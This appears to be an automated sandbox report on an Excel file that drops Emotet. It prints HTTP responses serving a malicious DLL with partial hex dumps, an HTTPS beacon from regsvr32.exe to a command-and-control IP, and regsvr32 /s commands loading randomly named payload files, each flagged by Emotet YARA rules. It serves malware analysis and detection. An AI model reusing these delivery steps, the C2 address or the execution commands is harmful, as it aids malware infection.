10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nFnFnF91FnF93FnFoFnF4FnF4FvnF4F[nF4FnF4FnFnFnF4FnFRichnFPEL~b!`'p{PPw@@@.textP` `.rdataKpp@@.data@@.idata?@@.didat@@.rsrcP@@.relocP@B
Mar 2, 2022 16:17:01.571456909 CET	22	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: application/x-msdownload Expires: Wed, 02 Mar 2022 15:18:34 GMT Last-Modified: Wed, 02 Mar 2022 15:18:34 GMT Server: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/ Content-Disposition: attachment; filename="uVyr9TJj.dll" Content-Transfer-Encoding: binary X-Powered-By-Plesk: PleskWin Date: Wed, 02 Mar 2022 15:18:33 GMT Content-Length: 1028096 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nFnFnF91FnF93FnFoFnF4FnF4FvnF4F[nF4FnF4FnFnFnF4FnFRichnFPEL~b!`'p{PPw@@@.textP` `.rdataKpp@@.data@@.idata?@@.didat@@.rsrcP@@.relocP@B
Mar 2, 2022 16:17:02.721097946 CET	24	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: application/x-msdownload Expires: Wed, 02 Mar 2022 15:18:34 GMT Last-Modified: Wed, 02 Mar 2022 15:18:34 GMT Server: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/ Content-Disposition: attachment; filename="uVyr9TJj.dll" Content-Transfer-Encoding: binary X-Powered-By-Plesk: PleskWin Date: Wed, 02 Mar 2022 15:18:33 GMT Content-Length: 1028096 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nFnFnF91FnF93FnFoFnF4FnF4FvnF4F[nF4FnF4FnFnFnF4FnFRichnFPEL~b!`'p{PPw@@@.textP` `.rdataKpp@@.data@@.idata?@@.didat@@.rsrcP@@.relocP@B
Mar 2, 2022 16:17:04.931152105 CET	25	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: application/x-msdownload Expires: Wed, 02 Mar 2022 15:18:34 GMT Last-Modified: Wed, 02 Mar 2022 15:18:34 GMT Server: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/ Content-Disposition: attachment; filename="uVyr9TJj.dll" Content-Transfer-Encoding: binary X-Powered-By-Plesk: PleskWin Date: Wed, 02 Mar 2022 15:18:33 GMT Content-Length: 1028096 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nFnFnF91FnF93FnFoFnF4FnF4FvnF4F[nF4FnF4FnFnFnF4FnFRichnFPEL~b!`'p{PPw@@@.textP` `.rdataKpp@@.data@@.idata?@@.didat@@.rsrcP@@.relocP@B

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	168.119.39.118	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Direction	Data
2022-03-02 15:19:50 UTC	OUT	GET /VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy HTTP/1.1 Cookie: lNoAlmMWNqxkzJO=AL4lu/QDFP/gSd6e2NBEVOKc1Goi3YlVwmueKcyR6a1HN/ziVgw+GTzP2pv++a7HcVDWG1mZHu2gisHDPZLfJxwA0O0esxmVS0e17XvSeonktSj+auGTYHLAeTw9LtYwhPCG5PNEJx0EKPU4Urz3acxICGBTVESIvLr+kijyToSmxbQLDvdd7AG/0V8ZLTdL2FO9bftPGowsaHOQ2HK3wTWVf9e0lABmsVp/z6caa5tFOieTPiaRnTourFS3vYbHKL1sCEPXx4m4dFGm Host: 168.119.39.118 Connection: Keep-Alive Cache-Control: no-cache
2022-03-02 15:19:51 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Mar 2022 15:19:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-03-02 15:19:51 UTC	IN	Data Raw: 32 37 66 0d 0a bd 0b 22 31 8a 64 5f 4c 28 01 93 14 a4 4d cc f5 e7 f9 27 73 53 57 ed 3b 3d b9 b9 5a db 63 9a ce 45 6e ee ef 3d 15 a4 2e 20 c6 f5 7a 8d ce 6f 39 08 37 1b 4b a5 e2 cb 71 17 cb 5d 1f d3 c8 dd f1 2b f6 a4 f5 66 7e 97 51 79 5e c5 4d ab b7 93 2b 33 10 42 db 6b 51 c1 16 56 0f dd fc d4 f9 5c 55 0a a0 fe 17 f3 b9 5a 4f f5 00 a2 5b 9d 5c 30 62 53 82 16 2b 14 2e d1 75 79 d8 18 91 74 d4 84 cd 9b 83 07 b4 cd 31 82 ae 76 95 46 5b fc c2 ef d4 cd 45 a2 2f 48 eb c7 24 0f 48 27 3b 3e 12 ab db 9c 8c b0 d0 fd 7c 4b 3e 4a 3d 85 86 49 f2 b3 25 fd 87 a6 3e 61 14 f8 22 46 ce 52 67 ae 23 24 3f 02 7c dd 15 62 a4 e4 16 9b 6c 5a bf f8 1d 4d ac 4a f4 5b f2 99 a9 75 8c 94 8b 5d b6 c4 9e 51 57 5d 2e cb 12 43 bd 4a 1b 86 f9 8e 1b 60 9f 4a ca ca 10 c1 bf 4c b7 95 b3 97 1b Data Ascii: 27f"1d_L(M'sSW;=ZcEn=. zo97Kq]+f~Qy^M+3BkQV\UZO[\0bS+.uyt1vF[E/H$H';>\|K>J=I%>a"FRg#$?\|blZMJ[u]QW].CJ`JL

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 1532, Parent PID: 596

General

Target ID:	0
Start time:	16:16:19
Start date:	02/03/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f650000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 668, Parent PID: 1532

General

Target ID:	4
Start time:	16:18:34
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.708112308.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.707785239.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2976, Parent PID: 400

General

Target ID:	5
Start time:	16:18:34
Start date:	02/03/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0xff860000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1992, Parent PID: 668

General

Target ID:	6
Start time:	16:18:37
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.715213011.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1240, Parent PID: 1992

General

Target ID:	7
Start time:	16:18:41
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Khmezosgsvwvlhvi\qkla.nko"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.721082289.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2924, Parent PID: 1240

General

Target ID:	8
Start time:	16:18:44
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ddpavzijv\enzcvbgsf.ang"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.727092920.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 3060, Parent PID: 2924

General

Target ID:	9
Start time:	16:18:47
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Zjuyfwtdbmueckv\xkir.afb"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.733570022.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2812, Parent PID: 3060

General

Target ID:	10
Start time:	16:18:50
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pgxqwqvekhwwh\rhpkutq.uip"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.740360397.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1684, Parent PID: 2812

General

Target ID:	11
Start time:	16:18:53
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Dksvywywhfyvdxey\snubtaeuhkc.jlg"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.749819742.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1484, Parent PID: 1684

General

Target ID:	12
Start time:	16:18:57
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Heesquvdnbifaezb\zihdgfvo.tnp"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.755941529.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.756084497.00000000002E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1968, Parent PID: 1484

General

Target ID:	13
Start time:	16:19:00
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Viksf\nobrbbp.fhu"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.762582363.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2280, Parent PID: 1968

General

Target ID:	14
Start time:	16:19:03
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mrxcvolbdndnzuh\zephifx.tqg"
Imagebase:	0xa40000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.769378943.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.769479040.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2164, Parent PID: 2280

General

Target ID:	15
Start time:	16:19:07
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smmsikqqg\mwljdvldbkxxxd.uuj"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.776100426.0000000000251000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.776041513.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

